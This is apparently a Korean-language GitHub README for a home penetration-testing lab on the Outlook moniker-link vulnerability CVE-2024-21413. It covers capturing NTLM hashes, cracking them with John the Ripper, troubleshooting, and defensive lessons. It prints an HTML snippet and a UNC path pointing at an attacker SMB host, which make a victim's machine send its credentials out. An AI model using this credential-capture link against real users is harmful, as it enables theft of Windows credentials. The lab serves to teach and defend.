
침투 테스트 랩으로, CVE-2024-21413 모니커 링크 취약점을 이용한 NTLM 자격 증명 탈취 과정을 시연합니다. 공격 실행, 해시 크래킹 및 방어 대책을 포함합니다.
NTLM 자격 증명 탈취를 위한 CVE-2024-21413 moniker link 익스플로잇을 시연하는 실습형 침투 테스트 랩입니다. 이 프로젝트는 설정부터 자격 증명 탈취까지 완전한 공격 체인을 문서화하며, 실제 환경에서의 문제점과 해결 방안을 포함합니다.
주요 성과: 격리된 실습 환경(Windows 10 VM)과 실제 시스템(Windows 11 PC)에서 moniker link 공격을 성공적으로 수행하여 실질적인 보안 취약점과 방어 대책을 입증했습니다.
공격 머신:
대상 시스템:
네트워크 구성:
HTML 파일 (test.html):
<!DOCTYPE html>
<html>
<body>
<p><a href="file://192.168.56.10/test">click me</a></p>
</body>
</html>
파일 탐색기 방법:
\\192.168.56.101\test 입력문제:
근본 원인:
해결 방안:
교훈: 기본 Windows 방화벽은 이 공격에 효과적인 보호를 제공합니다. 사용자는 방화벽을 활성화 상태로 유지해야 합니다.
문제:
nwigwecj112Honey (잘못된 비밀번호!)12Honey는 이전 테스트에서 나온 값근본 원인:
~/.john/john.pot에 크래킹된 비밀번호 저장해결 방안:
1414로 변경교훈: 항상 올바른 해시를 크래킹하고 있는지 확인하세요. pot 파일을 지우거나 테스트에 고유한 비밀번호를 사용하세요.
문제:
1414가 rockyou.txt(1,400만 비밀번호)에 없음근본 원인:
해결 방안:
echo "1414" > passwords.txt
echo "4141" >> passwords.txt
교훈: "Rockyou.txt에 없다" ≠ 안전함. 짧은 비밀번호는 단어 목록 유무와 관계없이 대상 공격 및 무차별 대입에 취약합니다.
✅ Windows 방화벽 - 활성화 시 공격을 완전히 차단 ✅ 최신 브라우저 - Chrome/Edge가 원격 file:// 링크 차단 ✅ 사용자 인식 - 수동 프롬프트는 사용자 조치 필요
❌ 약한 비밀번호 - 4자리 숫자는 쉽게 크래킹됨 ❌ 방화벽 비활성화 - 일반적인 사용자 실수 ❌ 파일 탐색기 - UNC 경로에 대한 경고 없음 ❌ NTLM 프로토콜 - SMB 공유에 자동 인증
1. 방화벽이 중요
2. 비밀번호 강도의 환상
1414는 rockyou.txt에 없음 ( "강력해" 보임)3. 사용자 개입 필요
공격 도구:
인프라:
Moniker-Link-Lab-Setup/
├── README.md (이 파일)
├── Documentation/
│ ├── attack-execution.md (단계별 공격 가이드)
│ └── README.md (문서 개요)
├── Screenshots/ (공격 스크린샷 - 추후 추가 예정)
└── Scripts/ (HTML 테스트 파일 - 추후 추가 예정)
기술적:
전문적:
모든 테스트는 승인된 시스템에서 수행되었습니다:
법적 고지: 승인되지 않은 컴퓨터 접근은 불법입니다. 이 프로젝트는 교육 목적과 승인된 테스트 환경에서만 사용해야 합니다.
LinkedIn: https://www.linkedin.com/in/chukwuemeka-nwigwe-624aa3292/ GitHub: @E-m-e-k-a
날짜: 2026년 3월
교육 목적으로만 사용 가능합니다. 승인되지 않은 테스트에는 사용할 수 없습니다.
⭐ 이 프로젝트가 도움이 되셨다면 저장소에 별표를 눌러주세요!
| 지표 | 결과 |
|---|
| 초기 비밀번호 | nwigwecj1 |
| 변경된 비밀번호 | 1414 |
| 단어 목록 | 사용자 정의 (2개 항목) |
| 크래킹 시간 | <1초 |
| 방화벽 | 테스트를 위해 비활성화 |
| 상태 | ✅ 성공적으로 침해됨 |
| 지표 | 결과 |
|---|
| 비밀번호 | 1414 |
| 방화벽 | 초기 차단 후 비활성화 |
| 인증 | 수동 프롬프트 (자격 증명 입력) |
| 크래킹 시간 | 즉시 |
| 상태 | ✅ 성공적으로 침해됨 |